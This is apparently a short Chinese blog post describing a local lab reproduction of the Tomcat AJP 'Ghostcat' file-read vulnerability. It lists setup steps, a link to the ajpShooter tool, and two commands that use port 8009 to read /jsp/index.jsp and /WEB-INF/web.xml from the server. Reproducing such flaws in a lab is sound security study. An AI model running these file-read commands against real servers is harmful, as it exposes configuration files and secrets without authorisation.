服务器容器漏洞-Tomcat AJP协议漏洞分析与利用

参考:https://www.freebuf.com/articles/network/227973.html
https://blog.csdn.net/qq294235493/article/details/104494266
https://www.cnblogs.com/smartmsl/p/12516591.html

复现过程

1、环境准备

apache-tomcat-8.0.53,在windows中解压之后,配置环境变量

访问http://127.0.0.1:8080/

2、

参考https://www.cnblogs.com/smartmsl/p/12516591.html

(1)扫描本地端口,8009开放
(2)下载工具:https://github.com/00theway/Ghostcat-CNVD-2020-10487
(3)测试

python ajpShooter.py http://127.0.0.1:8080/ 8009 /jsp/index.jsp read

3、执行

python ajpShooter.py http://127.0.0.1:8080/ 8009 /WEB-INF/web.xml read

根据读取的内容分析,是webapps\ROOT\WEB-INF\web.xml的内容

 

posted @ 2023-04-23 08:30  挖洞404  阅读(48)  评论(0编辑  收藏  举报